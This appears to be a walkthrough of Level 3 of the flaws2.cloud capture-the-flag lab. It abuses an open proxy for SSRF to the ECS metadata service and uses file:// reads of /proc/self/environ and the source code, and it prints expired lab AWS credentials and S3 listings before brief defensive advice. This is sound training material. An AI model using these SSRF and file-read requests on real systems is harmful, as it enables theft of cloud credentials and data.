5 minute read Published:

Level 3

Exploring the proxy

We can use the proxy to request more or less any website (HTTP only). Confirm with icanhazip.com, which reflects the requesters IP. For the proxy it is “”:

[email protected]:/# curl -i http://container.target.flaws2.cloud/proxy/http://icanhazip.com/
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 22 Nov 2019 08:36:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

This is indeed the public IP of the proxy:

[email protected]:/# dig container.target.flaws2.cloud
container.target.flaws2.cloud. 377 IN   A

Accessing task metadata

This looks remarkably similar to level 5 of flaws.cloud. In that level, an EC2 machine hosts a proxy. It can be compromised by accessing the instance metadata service. Why not just try the same thing here:

[email protected]:/# curl -i http://container.target.flaws2.cloud/proxy/
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 22 Nov 2019 08:33:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive

Sad, no output. Why is that? In ECS there is a similar but slightly different thing called task metadata service, as documented here. Interestingly, there also seems to be a metadata file, but that won’t help us in this level too much (further reading). Two possible versions:

  • Version 2: is very similar to the instance metadata service of EC2 machines. You can access it at the link-local IPv4 address “”. From there just follow the (non-clickable) links or read the documentation to find out where the juicy stuff is.
  • Version 3: is more or less the same as version 2 but the endpoint is dynamic. The URI is exposed to the container in the “ECS_CONTAINER_METADATA_URI” environment variable. This adds an additional layer of defense. Better hope that version 2 works.

Try version 2 by requesting curl -s http://container.target.flaws2.cloud/proxy/ | jq. The output is a pretty JSON with all the details. Here is parts of it:

  "Cluster": "arn:aws:ecs:us-east-1:653711331788:cluster/level3",
  "TaskARN": "arn:aws:ecs:us-east-1:653711331788:task/5782c64d-114b-4c40-8c14-06d59ca07797",
  "Family": "level3",
  "Revision": "3",
  "DesiredStatus": "RUNNING",
  "KnownStatus": "RUNNING",
  "Containers": [
      "DockerId": "55c3211baa020d5e766172e2bd690a1e38ff28d44d4aff7bb42906c0033b25ba",
      "Name": "~internal~ecs~pause",
      "DockerName": "ecs-level3-3-internalecspause-acfae1d980e58decd801",
      "Image": "fg-proxy:tinyproxy",
      "ImageID": "",
      "DockerId": "e858669ed741177c7d316cb6c686090dbd6d6fd75e2d98181bac4dc5847e0710",
      "Name": "level3",
      "DockerName": "ecs-level3-3-level3-a8cf8fd0fd9ccea51300",
      "Image": "653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",

So we do have an ECS task with two containers. One is based on the “level2” image we found in the previous level. Based on its name, the other seems to be running tinyproxy. I suspect this is a container used by ECS internally to provide the “awsvpc” networking mode, so we should not care about it too much (compare ECS internals).

So far so good, but how do we get at the credentials? The documentations does not say anything about that. My first try was to go to the same endpoint used in the instance metadata service. For example, try appending “/iam/info”. Unfortunately, we will only get “Unable to generate metadata …” responses back.

Have a look at the ECS developer documentation instead. It contains all the details about ECS, including how to get the credentials. In there we learn that the endpoint for credentials is dynamic and stored in the environment variable “AWS_CONTAINER_CREDENTIALS_RELATIVE_URI”. Uh oh, we are back to reading environment variables.

TODO: check source of proxy to see if file protocol is supported. Now we just make a request against “/proc/self/environ”, where Linux exposes all environment variables of the current process in form of a file.

 # curl --output - http://container.target.flaws2.cloud/proxy/file:///proc/self/environ

If you do there request you will notice there are no line breaks. I’ve added them above for readability. Now we know where to go for the credentials:

 # curl -s http://container.target.flaws2.cloud/proxy/ | jq
  "RoleArn": "arn:aws:iam::653711331788:role/level3",
  "SecretAccessKey": "Bq9AnAFihjdau4tbb4l1KrIzifXzhWdVlBdIH89c",
  "Token": "FwoGZXIvYXdzEOv//////////wEaDGW1cqeLZ64imCuCBiLgAmsez/FXqR1kaG7vmFZPggaqblIeIZiJ+p+dCJJawIIKFyzM9sfkjtyeV12rGd/58eNNnASObJmC+UHceizhBo8PbthNkHM8FMptzFBUeo/fwqRFCSw8L/kLENn8I7NpiO9ek2DcrEATysZDyuzWve4xBF82PKgOZn2cCErC0y0XGa/UgXlZUM/NgzmqrLSC9SSndReqhU5BLWrcoknzdkTDBu1HRUvs3vLaftsPBcdmNd50B8lN8Jh4EfiZVc3ECo3SZ10xosHXVWmHBZsHcLBPMlDMLvLxZeXryVWrVKMYSWGiWSCZjtrdelZFMBmBS+v7W47i1DMjPZrsoV/pri0TfvpIvFfGW18Th+UQV9NHEi+Al5wmbVRY5JUVUlVvoDLduyutIAMCWqrIemATzs/U4KlYsmI1JSEckmnerqv8J7qjficigWi397P8yuVMrFYiC/l94JeOQWB/TEnCHEUoqN3e7gUyngG+3xenII8s9CTX+jwytMBwdfyHY+2uSB1ez8AxpsL4kDrfIodIXzBE6UuWnwMYEKfhx7m/1L801OP2epDT2zOJQbYeRlxZiFBMomKYB2s0PPyuSIJbTY6BcDrjMaGryE9A+9tSJVkbFA42NuVkHUyT2AMkje69q/C6xzxX0+Wkts+DaqOnnIKjPpZBVEACSoWk6FJeGHF6ePP5gpoi4w==",
  "Expiration": "2019-11-22T15:47:20Z"

As usual, configure credentials and verify if it works:

 # export AWS_SECRET_ACCESS_KEY=Bq9AnAFihjdau4tbb4l1KrIzifXzhWdVlBdIH89c
 # export AWS_SESSION_TOKEN=FwoGZXIvYXdzEOv//////////wEaDGW1cqeLZ64imCuCBiLgAmsez/FXqR1kaG7vmFZPggaqblIeIZiJ+p+dCJJawIIKFyzM9sfkjtyeV12rGd/58eNNnASObJmC+UHceizhBo8PbthNkHM8FMptzFBUeo/fwqRFCSw8L/kLENn8I7NpiO9ek2DcrEATysZDyuzWve4xBF82PKgOZn2cCErC0y0XGa/UgXlZUM/NgzmqrLSC9SSndReqhU5BLWrcoknzdkTDBu1HRUvs3vLaftsPBcdmNd50B8lN8Jh4EfiZVc3ECo3SZ10xosHXVWmHBZsHcLBPMlDMLvLxZeXryVWrVKMYSWGiWSCZjtrdelZFMBmBS+v7W47i1DMjPZrsoV/pri0TfvpIvFfGW18Th+UQV9NHEi+Al5wmbVRY5JUVUlVvoDLduyutIAMCWqrIemATzs/U4KlYsmI1JSEckmnerqv8J7qjficigWi397P8yuVMrFYiC/l94JeOQWB/TEnCHEUoqN3e7gUyngG+3xenII8s9CTX+jwytMBwdfyHY+2uSB1ez8AxpsL4kDrfIodIXzBE6UuWnwMYEKfhx7m/1L801OP2epDT2zOJQbYeRlxZiFBMomKYB2s0PPyuSIJbTY6BcDrjMaGryE9A+9tSJVkbFA42NuVkHUyT2AMkje69q/C6xzxX0+Wkts+DaqOnnIKjPpZBVEACSoWk6FJeGHF6ePP5gpoi4w==
 # aws sts get-caller-identity
    "UserId": "AROAJQMBDNUMIKLZKMF64:5782c64d-114b-4c40-8c14-06d59ca07797",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/level3/5782c64d-114b-4c40-8c14-06d59ca07797"

And again the usual game of trying out what we can do. Similar to all the other levels we look for stuff in s3, so try this:

[email protected]:/# aws s3 ls
2018-11-20 19:50:08 flaws2.cloud
2018-11-20 18:45:26 level1.flaws2.cloud
2018-11-21 01:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
2018-11-26 19:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
2018-11-27 20:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud

That was it. Go to the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud and watch the end of the game:

The end of the game

The flaw

Secure the proxy

Review application code

Since we know how to get files, get the proxy files out of the image (we could just look at the image we got from the previous level but this way it is cooler).

Start by checking the cmdline of the process with PID 1, which should be the one the container was launched with:

# curl --output - http://container.target.flaws2.cloud/proxy/file:///proc/1/cmdline

Good, we now check out “/var/www/html/start.sh” to see what is going on:

 # curl --output - http://container.target.flaws2.cloud/proxy/file:///var/www/html/start.sh
python /var/www/html/proxy.py &

That is a simple one. Now we are just a single call away from the source. Do curl --output - http://container.target.flaws2.cloud/proxy/file:///var/www/html/proxy.py to load the code:

import SocketServer
import SimpleHTTPServer
import urllib
import os

PORT = 8000

class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
  def do_GET(self):
    self.send_header("Content-type", "text/html")

    # Remove starting slash
    self.path = self.path[1:]

    # Read the remote site
    response = urllib.urlopen(self.path)
    the_page = response.read(8192)

    # Return it

httpd = SocketServer.ForkingTCPServer(('', PORT), Proxy)
print "serving at port", PORT

Here we can see that the developer intended to make a proxy just for HTTP GET requests but uses “urllib.urlopen” on whatever the string is that the user supplies. No matter the Python version, this function supports other schemes besides HTTP (see Python2 and Python3 docs).

The code also confirms that no HTTP method other than GET is supported. “urllib.urlopen” makes GET requests by default, optionally POST requests if an additional argument like data="param=value" is provided. The code snippet at hand passes no such argument. Thus there is nothing we can do.

Least privilege

Do not give the container access to S3 if not needed.


Same issue again but more difficult to use this time. AWS is working hard to mitigate this stuff.